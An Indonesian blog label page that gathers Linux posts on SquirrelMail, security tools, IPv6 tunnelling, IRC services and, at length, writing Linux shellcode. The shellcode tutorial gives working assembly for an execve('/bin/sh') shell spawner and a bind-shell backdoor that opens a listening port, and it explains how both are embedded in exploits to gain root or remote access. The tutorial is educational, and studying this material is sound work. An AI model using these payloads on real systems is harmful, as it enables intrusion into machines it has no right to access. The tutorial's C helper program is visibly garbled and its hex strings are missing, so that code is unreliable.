AnasKi Blog's

Salam Pembuka

Welcome to AnasKi CreW !

Trima kasih Telah Mengunjungi Blog saya dan jangan lupa tinggalkan komentar :D
Tampilkan postingan dengan label Linux. Tampilkan semua postingan
Tampilkan postingan dengan label Linux. Tampilkan semua postingan
  1. Login Webmail/Webserver

  2. Login Webmail, Webserver
    1. Masukan Alamat Email
    2. Masukan Password Anda
    3. Kemudian Tekan Tombol Login

  3. Pilih WebMail Server

  4. Webmail, SquirrelMail, Atmail, Horde, roundcube
    Setelah Login akan terlihat seperti gambar di atas,, disini saya akan memilih Webmail SquirrelMail karna dsni saya akan membahas tentang SquirrelMail :D,, anda jg bsa menggunakan webmail server yg lain,,
  5. Menukar Bahasa

  6. Menukar Bahasa, setting bahasa, Webmail, SquirrelMail
    Tekan Option, lalu akan muncul sperti kotak di bawah ini,,,

    Menukar Bahasa, setting bahasa, Webmail, SquirrelMail

    Setelah Itu Pilih Display Preferences,, muncul kotak dialog seperti di bawah ini

    Menukar Bahasa, setting bahasa, Webmail, SquirrelMail

    1. Merubah Thema
    2. Merubah Bentuk Tulisan
    3. Merubah Bahasa
    Silahkan Pilih Nomor 3,, di ganti dengan Bahasa Indonesia,, pilih aja yang mana anda suka ;D,, setelah selesai tekan tombol paling bawah yang tulisannya submit dlm bahasa inggris atau kirim dalam bahasa indonesia

  7. Mengirim pesan
  8. mengirim pesan, kirim pesan, Webmail, SquirrelMail
    pilih tulisan , lalu akan muncul kotak seperti di bawah ini

    mengirim pesan, kirim pesan, Webmail, SquirrelMail
    1. Alamat Email Yang akan di kirim
    2. CC : Carbon Copy di gunakan untuk mengirim ke bnyak orang sama fungsinya dengan tag,, BCC sama fungsinya dg CC
    3. Subject merupakan judul pesan yang akan di kirim
    4. Prioritas digunakan untuk Status Pesan, Contoh : Biasa dan pesan ini tidak terlalu penting
    5. Ini adalah Tempat Untuk Isi Pesan
    6. Lampiran Ibarat Mengirim Barang di Post,, lampiran di gunakan untuk mengirim suatu file ke email
    7. Setelah Selesai Lalu Kirim
cukup sekian artikelnya kali ini klau ada pertanyaan silahkan di komentar,,,,, :D
1. John the Ripper

John the Ripper is a free password cracking software tool initially developed for the UNIX operating system. It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.

2. Nmap

Nmap is my favorite network security scanner. It is used to discover computers and services on a computer network, thus creating a "map" of the network. Just like many simple port scanners, Nmap is capable of discovering passive services on a network despite the fact that such services aren't advertising themselves with a service discovery protocol. In addition Nmap may be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, presence of some firewall techniques and, on a local area network, even vendor of the remote network card.

Nmap runs on Linux, Microsoft Windows, Solaris, and BSD (including Mac OS X), and also on AmigaOS. Linux is the most popular nmap platform and Windows the second most popular.

3. Nessus

Nessus is a comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested systems such as:

-Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
-Misconfiguration (e.g. open mail relay, missing patches, etc).
-Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
-Denials of service against the TCP/IP stack by using mangled packets

Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006 security tools survey from SecTools.Org.

4. chkrootkit

chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.

It can be used from a "rescue disc" (typically a Live CD) or it can optionally use an alternative directory from which to run all of its own commands. These techniques allow chkrootkit to trust the commands upon which it depend a bit more.

There are inherent limitations to the reliability of any program that attempts to detect compromises (such as rootkits and computer viruses). Newer rootkits may specifically attempt to detect and compromise copies of the chkrootkit programs or take other measures to evade detection by them.

5. Wireshark

Wireshark is a free packet sniffer computer application used for network troubleshooting, analysis, software and communications protocol development, and education. In June 2006, the project was renamed from Ethereal due to trademark issues.

The functionality Wireshark provides is very similar to tcpdump, but it has a GUI front-end, and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network but support is being added for others) by putting the network interface into promiscuous mode.

Wireshark uses the cross-platform GTK+ widget toolkit, and is cross-platform, running on various computer operating systems including Linux, Mac OS X, and Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.

6. netcat

netcat is a computer networking utility for reading from and writing to network connections on either TCP or UDP.

Netcat was voted the second most useful network security tool in a 2000 poll conducted by on the nmap users mailing list. In 2003, it gained fourth place, a position it also held in the 2006 poll.

The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.

Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat.

7. Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b and 802.11g traffic.

Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.

8. hping

hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies).

9. Snort

Snort is a free and open source Network Intrusion prevention system (NIPS) and network intrusion detection (NIDS) capable of performing packet logging and real-time traffic analysis on IP networks.

Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts, amongst other features. The software is mostly used for intrusion prevention purposes, by dropping attacks as they are taking place. Snort can be combined with other software such as SnortSnarf, sguil, OSSIM, and the Basic Analysis and Security Engine (BASE) to provide a visual representation of intrusion data. With patches for the Snort source from Bleeding Edge Threats, support for packet stream antivirus scanning with ClamAV and network abnormality with SPADE in network layers 3 and 4 is possible with historical observation.

10. tcpdump

tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

In some Unix-like operating systems, a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges. However, the -Z option may be used to drop privileges to a specific unprivileged user after capturing has been set up. In other Unix-like operating systems, the packet capturing mechanism can be configured to allow non-privileged users to use it; if that is done, superuser privileges are not required.

The user may optionally apply a BPF-based filter to limit the number of packets seen by tcpdump; this renders the output more usable on networks with a high volume of traffic.

1. Daftarkan ip public di atau
- Anda akan mendapatkan ipv6 dan ip gateway ipv6
misal ipv6 : 2001:618:4:2000::d56 dan
ipv6 gateway :

2. Aktifkan ipv6 pada shell anda :
#/sbin/modprobe ipv6
#/sbin/ifconfig sit0 up
#/sbin/ifconfig sit0 inet6 add 2001:618:4:2000::d56
#/sbin/route -A inet6 add ::/0 gw :: sit0
#/sbin/ifconfig sit0

Jika keluar seperti di bawah ini ber-arti ipv6 anda dah SIP :)

sit0 Link encap:IPv6-in-IPv4
inet6 addr: 2001:618:4:2000::d56/0 Scope:Global
inet6 addr: :: Scope:Unknown
inet6 addr: :: Scope:Compat
RX packets:310 errors:0 dropped:0 overruns:0 frame:0
TX packets:362 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:
RX bytes:60058 (58.6 Kb) TX bytes:35607 (34.7 Kb)

3. Test ipv6 anda dengan :

#/usr/sbin/ping6 2001:618:4:2000::d56 << punya nya XF86Setup

4. Install psybnc2.3.1 (support ipv6)
- Isi vhost dengan 2001:618:4:2000::d56

5. Masuk ke psybnc
- /addserver
- /addsevver

sumber :
--//  Intro

Dalam dunia computer security, kata 'exploit' merupakan salah satu kata
yang paling sering digunakan dan dijumpai. Exploit seakan-akan seperti
senjata super yang dapat digunakan untuk membobol suatu sistem,
benarkah?! Yup, exploit memang dapat di ibaratkan sebagai suatu senjata
yang dapat digunakan untuk menyerang dan menjebol suatu sistem sehingga
kita bisa mendapatkan akses pada sistem tersebut. Prinsip dasar mengenai
exploit telah di berikan oleh y3dips pada echo|zine 13, pada
ezine tersebut y3dips menggambarkan bagaimana proses pembuatan suatu
exploit berdasarkan informasi hole pada suatu sistem.

Saat ini, ada cukup banyak jenis exploit yang dapat digunakan. Ada
exploit yang menyerang suatus sistem secara langsung dengan memanfaatkan
security hole pada sistem tersebut (system based), dan ada juga exploit
yang digunakan untuk menyerang security hole pada suatu aplikasi web
(web based e[x]ploit). Ada sangat banyak cara menemukan hole security,
dan ada banyak juga jenis hole yang dapat di manfaatkan (sekali lagi,
silahkan baca artikel y3dips mengenai 0day exploit pada echo|zine 13).

Diantara jenis hole tersebut, ada 1 jenis hole yang dapat dikatakan
sebagai jenis hole tertua dimana jenis hole tersebut digunakan sebagai
dasar pembuatan exploit bahkan hingga saat ini. Jenis hole tersebut
adalah 'buffer overflow', yang hingga saat ini masih menjadi salah
satu jenis hole tertua namun banyak di gunakan sebagai dasar menemukan
kelemahan suatu sistem maupun aplikasi yang sifat nya system based.
Saya tidak akan menjelaskan secara rinci bagaimana cara kerja buffer
overflow, untuk memahami nya silahkan baca artikel buatan aleph1
yang berjudul "Smashing The Stack for Fun and Profit".

Dalam exploit yang memanfaatkan jenis hole buffer overflow, kita
pasti akan menemukan apa yang di sebut dengan "Shellcode". Umumnya
banyak yang tidak memahami apa itu shellcode, bagaimana cara membuatnya,
bagaimana prinsip dasar cara kerja nya, dsb. Tapi yang pasti, shellcode
berbentuk karakter-karakter aneh yang dimasukan dalam source code suatu
exploit, dan saya yakin banyak sekali teman-teman yang penasaran dengan
karakter-karakter aneh tersebut dan bertanya-tanya apa itu sebenarnya :).

Oh iya, sebelum nya saya harap anda telah memahami prinsip dasar
bagaimana komputer bekerja khusus nya bagaimana suatu program berjalan
pada sebuah komputer, dengan kata lain anda memiliki pengetahuan dasar
mengenai pemrograman tingkat rendah untuk memahami prinsip kerja shellcode,
bagi anda yang belum memahami ada baik nya membaca-baca terlebih dahulu
dasar-dasar pemrograman assembly baik pada linux maupun windows (secara
prinsip sama aja kok :) ). we go!

---// Shellcode

Shellcode merupakan program yang akan mengambil alih suatu sistem sesaat
setelah exploit membuat sistem tersebut 'crash'. Shellcode dapat
diibaratkan seperti telur yang di bungkus oleh exploit, saat exploit
berhasil merusak suatu sistem maka telur yang ada didalamnya akan segera
mengambil alih sistem tersebut. Dalam prinsip dasar cara kerja komputer,
prosesor hanya akan melakukan 1 buah instruksi dalam satu waktu. Yang
memberikan instruksi tersebut adalah program (contoh program: winamp,
notepad, dsb). Saat program akan di eksekusi (misal: kita klik icon
winamp), maka program winamp yang semula ada di hardisk akan diload ke
suatu lokasi di memori komputer, dan kemudian prosesor akan mengeksekusi
kode-kode program winamp tersebut. Dalam hal ini kita membicarakan
program tingkat rendah (bahasa mesin), program akan memberikan instruksi
kepada prosesor untuk mendapatkan suatu hasil tertentu, sebagai contoh
menuliskan karakter tertentu pada monitor.

Lalu apa yang sebenar nya dilakukan exploit?!exploit akan membuat suatu
aplikasi/sistem yang memiliki kelemahan tertentu 'crash' dan memboikot
aplikasi tersebut sehingga prosesor yang seharus nya menjalankan
kode-kode program aplikasi tadi akan diarahkan untuk menjalankan
kode-kode lain yang telah di persiapkan oleh exploit. Yup, kode-kode
yang telah di persiapkan tersebut adalah shellcode.

Saat exploit merusak suatu aplikasi/sistem, exploit akan menempatkan
shellcode di suatu lokasi memori pada mesin target, selanjut nya exploit
akan membuat prosesor menuju lokasi memori tempat shellcode telah ditanam
dan kemudian akan mengeksekusi nya. Mekanisme ini berhubungan langsung
dengan prosesor dan memory, itu sebab nya shellcode dibuat agar dapat
langsung di tanam pada memori sehingga bentuk nya cukup aneh.

Berikut contoh shellcode:

char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x0f\x59\xb3"

Bagi mereka yang sering kutak-katik exploit terutama dengan mempelajari
source codenya (bukan cuma menggunakan saja) pasti sering melihat bentuk
diatas, dan saya yakin banyak yang bertanya-tanya apa itu sebenarnya :).

Karakter-karakter diatas merupakan bentuk yang dapat langsung ditempakan
pada memory komputer, dan dapat segera di eksekusi oleh prosesor. Apabila
dieksekusi, shellcode diatas akan menginstruksikan prosesor untuk
menampilkan tulisan "Hello, World!" pada monitor (STDOUT).

---// Pembuatan Shellcode

Dari penjelasan diatas, saya rasa cukup jelas ada nya pernyataan bahwa
shellcode adalah 'telur' yang di bawa oleh exploit untuk di eksekusi oleh
target. Dengan kata lain, exploit akan memaksa mesin target melakukan suatu
instruksi tertentu sesuai dengan jenis shellcode yang akan digunakan.
Diantara teman-teman mungkin pernah juga melihat pernyataan bahwa exploit
itu spesifik untuk suatu jenis mesin (platform) tertentu dan spesifik
untuk sistem operasi tertentu, misalnya: exploit untuk linux tidak dapat
digunakan oleh windows. Kenapa?! karena tiap platform (misal: intel, sparc,
mac) maupun sistem operasi (linux, freebsd, sun solaris) memiliki aturan
standar tertentu untuk proses alokasi memory serta instruksi prosesornya.
Dengan begitu, shellcode untuk suatu platform maupun sistem operasi
tertentu tentu akan berbeda dengan platform dan sistem operasi lain nya.

Dari penjelasan tentang shellcode diatas, dapat dipahami mengapa suatu
mesin yang telah diexploit bisa kita dapat kan shell nya...ataupun dapat
melakukan serangan DOS tertentu terhadap mesin lain, ataupun setelah di
exploit tiba-tiba mesin target akan membuka port tertentu dimana kita bisa
masuk ke sistem tersebut melalui port yang baru saja dibuka, dsb. Itu
semua tergantung dari jenis shellcode yang kita gunakan terhadap mesin
target. Namun untuk membuat exploit tidak semudah membicarakan nya, harus
dilakukan percobaan terlebih dahulu untuk mengetahui bagaimana cara membuat
sistem tersebut crash, bagaimana cara kita meletakan shellcode pada memory
mesin target sesaat setelah aplikasi/sistem nya 'crash', dsb.

Untuk proses pembuatan exploit di luar cakupan bahasan saat ini (karena
terlalu luas, may be next article :) ). Saat ini, kita hanya akan bahas
proses membuat shellcode dan apa saja hal-hal penting yang harus
diperhatikan saat membuat shellcode tersebut.

---// Tools

Untuk membuat shellcode, minimal harus memiliki pengetahuan dasar mengenai
bahasa pemrograman tingkat rendah (assembly), bahasa C, system call dan
pemrograman jaringan. Untuk artikel ini saya menggunakan sistem operasi
linux (backtrack), nasm, serta gcc yang semuanya berjalan di atas kernel
linux- dan seluruh code program yang digunakan sebagai contoh
telah diujicoba sebelumnya.

Untuk proses kompilasi shellcode, akan digunakan tools opensource "nasm".
nasm digunakan untuk kompilasi kode assembly sehingga dapat di konversi
dalam bentuk string dan digunakan dalam exploit. Paket nasm juga
menyertakan disassembler yang dapat digunakan untuk disassemble compiled

Shellcode yang telah di compile harus diubah terlebih dahulu dalam bentuk
string hexadecimal (hex string) seperti contoh diatas (yang bentuknya aneh
=D). Untuk proses eksekusi shellcode yan telah di compile maupun
mengubahnya dalam bentuk hex string kita dapat menggunakan program dibawah

[Cyb3rh3b@k-elektronik] $ cat s-proc.c


* Print message function
static void
croack (const char *msg) {
fprintf(stderr, "%s\n",msg);
* Usage function
static void
usage (const char *prgnam) {
fprintf(stderr, "\nExecute code : %s -e \n",prgnam);
fprintf(stderr, "Convert code : %s -p \n\n",prgnam);
* Signal error and bail out.
static void
barf(const char *msg) {

* Main code starts here

main(int argc, char **argv) {
FILE *fp;
void *code;
int arg;
int i;
int l;
int m = 15; /* max # of bytes to print on one line */

struct stat sbuf;
long flen; /* Note: assume files are < flen =" (long)" code =" malloc(flen)))" fp =" fopen(argv[2]," arg =" getopt(argc,argv," fptr =" (void" l =" m;" i="0;i">= m) {
if (i) printf("\"\n");
printf( "\t\"");
printf("\\x%02x", ((unsigned char *)code) [i]);

default :
return 0;

[Cyb3rh3b@k-elektronik] $ gcc s-proc.c -o s-proc
[Cyb3rh3b@k-elektronik] $ ./s-proc

Execute code : ./s-proc -e
Convert code : ./s-proc -p

Compile source code tools tersebut dengan cara diatas, dan apabila
berhasil...coba tes apakah tools tersebut siap digunakan. Untuk mencoba
shellcode yang akan dijadikan contoh pada artikel ini, lakukan langkah

1. Tulis shellcode dalam bahasa assembly dan simpan dengan nama file .S,
contoh: hello.S
2. Lakukan kompilasi : nasm -o .S,
contoh: nasm -o hello hello.S
3. Untuk print shellcode gunakan: s-proc -p
4. Untuk eksekusi shellcode gunakan: s-proc -e

Ok, sekarang persiapan nya telah siap...segera kita lihat bagaimana cara
membuat shellcode :)

---// Code, code, code!

Saya harap anda telah memahami dari penjelasan sebelum nya bahwa shellcode
merupakan kode program yang telah berbentuk string hexadecimal untuk di
tempatkan pada suatu lokasi di memori target dan kemudian di eksekusi oleh
prosesor mesin tersebut. Pada contoh-contoh dibawah ini hanya memberikan
gambaran bagaimana membuat shellcode tesebut, bukan membuat exploit secara

Shellcode umum nya memanfaatkan system call, diantara system call tersebut
yang terpenting dan banyak digunakan adalah write dan execve. Berikut contoh
shellcode yang memanfaatkan system call write (yang ditulis dalam bahasa C
dan assembly):

[Cyb3rh3b@k-elektronik] $ cat write.c


int main()
char *str="Hello, echo!!";

return 0;


[Cyb3rh3b@k-elektronik] $ gcc write.c -o write
[Cyb3rh3b@k-elektronik] $ ./write
Hello, echo!!

program diatas apabila diconvert ke dalam bahasa assembly (jangan lupa, shellcode dibuat menggunakan bahasa tingkat rendah seperti assembly)
sebagai berikut:

[Cyb3rh3b@k-elektronik] $ cat write.S


xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
jmp short string
pop ecx
mov bl,1
mov dl,13
mov al,4
int 0x80
dec bl
mov al,1
int 0x80
call code
db 'Hello, echo!!'

compile source code diatas dan eksekusi dengan menggunakan tools s-proc:

[Cyb3rh3b@k-elektronik] $ nasm -o write write.S
[Cyb3rh3b@k-elektronik] $ s-proc -e write
Calling code ...
Hello, echo!!

program/shellcode diatas memanfaatkan system call write untuk menampilkan
tulisan "Hello, echo!!" di layar monitor, informasi lengkap mengenai system
call pada linux dapat dicari melalui internet, ada cukup banyak situs yang
menyediakan list system call serta penggunaan nya pada bahasa assembly (itu
sebab nya diatas tadi saya harap anda telah membaca mengenai pemrograman
assembly, khusus nya pada linux :) ). Dengan tools s-proc tersebut, kita
bisa mendapatkan bentuk hex string dari shellcode yang telah di compile:

[Cyb3rh3b@k-elektronik] $ s-proc -p write
/* The following shellcode is 43 bytes long: */

char shellcode[] =

hex string diatas dapat kita gunakan sebagai telur pada exploit, dan tentu
saja apabila di gunakan pada suatu exploit...maka setelah proses eksploitasi
mesin target akan menampilkan tulisan "Hello, echo!!" pada screen nya
(STDOUT) :).

Selain system call write, yang umum digunakan adalah system call execve.
Berikut contoh implementasi nya dalam bahasa C yang kemudian diconvert
kedalam bahasa assembly:

[Cyb3rh3b@k-elektronik] $ cat execve.c


int main()

char *command="/bin/sh";
char *args[2];



return 0;


program diatas memanfaatkan system call execve untuk meng-eksekusi command
"/bin/sh", dengan kata lain untuk membangkitkan shell pada sistem linux/unix.
Berikut ini adalah hasil konversi nya dalam bahasa assembly:

[Cyb3rh3b@k-elektronik] $ cat execve.S

xor eax,eax
push eax
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0x0b
int 0x80

[Cyb3rh3b@k-elektronik] $ nasm -o execve execve.S
[Cyb3rh3b@k-elektronik] $ s-proc -e execve
Calling code ...

shellcode tersebut akan di eksekusi mesin target, biasa nya digunakan untuk
membangkitkan shell seperti pada local exploit (mendapatkan shell root pada
target). Untuk menjadikan shellcode diatas sebagai telur yang siap di
bawa/dibungkus oleh exploit, kita harus mengubah nya dalam bentuk hex
string...untuk itu gunakan lagi tools s-proc:

[Cyb3rh3b@k-elektronik] $ s-proc -p execve
/* The following shellcode is 24 bytes long: */

char shellcode[] =

That's it, bentuk hex string diatas lah yang akan kita masukan pada
exploit :).

Shellcode yang digunakan pada exploit saat ini umum nya memanfaatkan system
call networking, sehingga mesin target dapat di akses secara remote.
Misalnya: shellcode untuk membuat mesin target membuka port tertentu dimana
telah disiapkan shell untuk penyerang apabila melakukan koneksi pada port
tersebut, atau bahkan membuat mesin target melemparkan shellnya kepada
penyerang secara langsung sehingga saat proses exploitasi selesai penyerang
akan mendapatkan akses shell ke mesin target.

Berikut ini salah satu contoh shellcode yang memanfaatkan pemrograman
jaringan, dimana shellcode akan membuat mesin target membuka suatu port dan
mengeksekusi shell ketika seseorang melakukan koneksi pada port tersebut.
Jadi, pada dasar nya shellcode ini merupakan backdoor pada remote system:

[Cyb3rh3b@k-elektronik] $ cat bindshell.c


int soc,cli;
struct sockaddr_in serv_addr;

int main()

bind(soc,(struct sockaddr *)&serv_addr,0x10);

return 0;


apabila di konversi ke dalam assembly maka program diatas akan menjadi:

[Cyb3rh3b@k-elektronik] $ cat bindshell.S


xor eax,eax
xor ebx,ebx

push eax
push byte 0x1
push byte 0x2
mov ecx,esp
inc bl
mov al,102
int 0x80
mov esi,eax ; store the return value in esi

push edx
push long 0xAAAA02AA
mov ecx,esp
push byte 0x10
push ecx
push esi
mov ecx,esp
inc bl
mov al,102
int 0x80

push edx
push esi
mov ecx,esp
mov bl,0x4
mov al,102
int 0x80

push edx
push edx
push esi
mov ecx,esp
inc bl
mov al,102
int 0x80
mov ebx,eax

xor ecx,ecx
mov cl,3
dec cl
mov al,63
int 0x80
jnz l00p

push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b
int 0x80

[Cyb3rh3b@k-elektronik] $ nasm -o bindshell bindshell.S
[Cyb3rh3b@k-elektronik] # s-proc -e bindshell
Calling code ...

Shellcode diatas akan membuka port 43690 saat di eksekusi, untuk melihatnya
bisa dilihat dengan utility netstat:

[Cyb3rh3b@k-elektronik] $ netstat -lt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:43690 *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN

Dan seperti biasa, untuk mendapatkan bentuk hex string dari shellcode
bindshell diatas kita tinggal menggunakan tools s-proc:

[Cyb3rh3b@k-elektronik] $ s-proc -p bindshell
/* The following shellcode is 96 bytes long: */

char shellcode[] =

Selanjutnya tinggal memasukan shellcode dalam bentuk hex string diatas dalam
exploit kita untuk dieksekusi oleh target :).

---// Summary

Artikel ini saya buat mengingat kebingungan saya saat awal-awal membaca source
code exploit dulu, dan diantara teman-teman juga mungkin ada yang sempat
bingung dengan fungsi shellcode pada saat membaca source code exploit.
Intinya, shellcode merupakan program yang dibawa oleh exploit dan akan
dieksekusi oleh target. Shellcode merupakan instruksi langsung yang akan
ditempatkan pada memori,itu sebab nya harus dalam bentuk hex string. Dan pada
artikel ini telah di berikan contoh bagaimana mendapatkan hex string dari
shellcode yang dibuat menggunakan bahasa assembly. Semoga saja dapat
memberikan gambara pada teman-teman mengenai shellcode dan bagaimana dasar
cara membuat nya. Untuk referensi lebih dalam mungkin bisa di coba untuk
membaca artikel nya aleph1 tentang buffer overflow dan artikel mengenai cara
pembuatan exploit.

Semog bermanfaat.


---// Reference

1. Smashing The Stack For Fun and Profit - Aleph1
2. Writing Security Tools and Exploits - James C. Foster ; Vincent Liu
3. 0second: Meet The Bugs - y3dips

Suatu Hari terjadilah percakapan antara linus.t dan b.gates mengenai siapakah
pembuat Nessus yang merupakan salah satu security scanner yang cukup ternama, dan sebelum
b.gates memutuskan untuk membelinya maka dia bertanya kepada linus tentang apakah arti
nessus itu sebenarnya, karena gates merasa takut jika ketidaktahuannya tentang arti
nessus akan menggagalkan rencananya untuk membeli nessus itu.

gates: nus, nessus itu apa artinya yah?
linus: waduh, coba dunk digunakan itu msn search beta muw itu
gates: hmm, (gates terlihat berfikir dengan malasnya untuk memanfaatkan salah satu andalannya MSN Search beta)
linus: bagaimana?
gates: apa dork yang biasa digunakan?
linus: MSN search beta punya dork (*nonsense)

Setelah sekian lama mencari dengan berbagai kata kunci di search engine keluarannya
akhirnya dengan tersenyum gates berkata,

gates: setelah dicari-cari maka aku simpulkan itu berasal dari yunani, merupakan nama
dari salah satu Centaur yang di bunuh oleh hercules, dan kemudian darahnya membunuh hercules

linus: halah, masih kurang canggih search enginemu, kurang tepat, itu dari bahasa jawa lho :D
gates: lah kok bisa?
linus: iyah pada saat Renaud Deraison melakukan pentest di sebuah perusahaan, dan menemukan
banyak vulnerabilities dengan tools yang ia buat, maka IT security perusahaan tersebut
akhirnya marah2, dan renaud pun habis dimarahi karena Manajer tersebut malu bukan kepalang.
gates: Lalu apa hubungannya ? (seraya dengan cepat mencoba memeriksanya di search engine miliknya)
linus: untuk mengenang hal itu Renaud pun memberi nama tools yang baru ia ciptakan dengan nama nessus
gates: halah kok bisa (sambil membuka tab IE 7 miliknya untuk menuliskan penjelasn linus ini di blognya)
linus: karena nessu ... artinya adalah marah dalam bahasa jawa, dan marah-marah berarti nessu-nessu
karena itu dia beri nama nessus (s; untuk jamak)
gates: wow, amazing.. what is your search engine linus? *seraya memposting tulisannya
linus: damn, ternyata kau memang benar pencipta "wind blows", i was kidding dude!
gates: #@^$$#&*#^!^!

Semua cerita diatas adalah bohong, semua karakter adalah palsu, kesamaan nama adalah
bukan kebetulan :P
Neostats adalah sebuah aplikasi stats ircd yang digunakan untuk memantau user yang masuk ke irc server

Pertama2 unduh/download file yg di bawah :
[root@ANASKI][:~]# wget
Setelah selesai lakukan perintah ekstrak file dengan perintah :
[root@ANASKI][:~]# tar -xvf NeoStats-2.5.1.tar.gz
kemudian masuk ke directory dg perintah :
[root@ANASKI][:~]# cd NeoStats-2.5.1
Berikutnya lakukan Perintah untuk kompilasi paket dengan perintah :
[root@ANASKI/NeoStats-2.5.1][:~]# ./configure –enable-unreal32
[root@ANASKI/NeoStats-2.5.1][:~]# make
[root@ANASKI/NeoStats-2.5.1][:~]# make install
Kemudian kembali ke menu awal dan masuk ke neostats, perintah :
[root@ANASKI/NeoStats-2.5.1][:~]# cd ..
[root@ANASKI][:~]# cd NeoStats
Selesaikan dengan :
[root@ANASKI/NeoStats][:~]# ./makeconf
What will your server name be? (ie:
[] -> <--- What is your IRC server's IP? (ie: [] -> <--- Use IP That was given by Voodoohosting. What is the IRCd's Link port? (ie: 7890) [6667] -> <--- Port that is opened on HUB Server for Servers\Links. What is the IRCd's Link password for stats? (ie: bleh) [LinkPass] -> <--- Password for connecting. ( C\N lines in IRCDs server). NeoStats Server comment? [NeoStats 2.5 IRC Statistical Server!] -> <--- Description of your NeoStats Server. Network name? (refer to your networks file. ie: CyberChat-IRC) [SomeNet-IRC] -> <--- Name of your Network. The host NeoStats is connecting from, most people use [NeoStats.Net] -> <--- NeoStats User? (This is the part before [Neo] -> <--- Ident for NeoStats. What channel should NeoStats join on IRC? [#services] -> <--- Channel that NeoStats will auto join on startup. Time in seconds we wait before attempting to reconnect to the server on a split? [10] -> <--- Time in seconds we wait before attempting to reconnect to the server on a split. What IP should NeoStats Bind to? (ie: This is optional. See neostats.cfg for more information [] -> <--- Use IP that was given by
[root@ANASKI/NeoStats][:~]# pico neostats.cfg
# NO_LOAD [YOU MUST REMOVE THIS] # If this is in the neostats.cfg your NeoStats WILL NOT START UP. To # disable this simply comment this line out. e.g. # # NO_LOAD <- NeoStats will not load. # # #NO_LOAD <- NeoStats will load. NO_LOAD <--- Set # in front of NO_LOAD (ex. #NO_LOAD). # LOAD_MODULE [OPTIONAL] # What modules to load at start-up. e.g. # # LOAD_MODULE statserv # # Will load up StatServ at boot # # Multiple instances of LOAD_MODULE may be specified # this is the StatServ Module #LOAD_MODULE statserv <--- If you want to ENABLE this Module remove #. #This is a new module. LoveServ, send a rose, hug, kiss, chocolate, etc to that # Special IRC Somebody. :D #LOAD_MODULE loveserv <--- If you want to ENABLE this Module remove #. # The HostServ module provides vhost services #LOAD_MODULE hostserv <--- If you want to ENABLE this Module remove #. # MoraleServ. A fun module to cheer people up. #LOAD_MODULE moraleserv <--- If you want to ENABLE this Module remove #. # ConnectServ will watch all connections to the network and can report them # to the services channel. It can also watch and report Nickname changes. #LOAD_MODULE connectserv <--- If you want to ENABLE this Module remove #. #SERVICE_ROOTS [OPTIONAL] # Who should get access to NeoStats regardless of their O line flags. # You can specify this option up to 10 times to specify different # nicks who will be allowed this privilege. e.g. # # SERVICE_ROOTS fish!?Fish@* # # Will give “fish” access to NeoStats Privileged commands if fish has # Umode +r and comes from the specified hostname and ident. #SERVICE_ROOTS Shmad!? #SERVICE_ROOTS ^Enigma^!*@*.au <--- Fix this to NICKNAME\IDENT\HOSTNAMEs of your ROOT Admins. #SERVICE_ROOTS Fish!?Fish@* Semoga Bermanfaat :D
Znc adalah client BNC seperti psyBNC, sBNC yang membuat anda tetap tersambung ke jaringan walaupun anda tidak tersambung (disconect) ke IRC client, Cara kerjanya sama dengan beberapa skrip seperti TCL dan pengaturannya pun sangat mudah.

Dengan Fitur sbb :
Banyak User
Anda dapat menambah user dibawah satu proses. Sangat berguna untuk shell umum yang membatasi background process. Setiap user dapat tersambung ke satu jaringan IRC.

Banyak Klien
Terhubung ke user yang sama dengan beberapa aplikasi sekaligus sebanyak yang anda mau.

Pemutaran Kembali Buffer
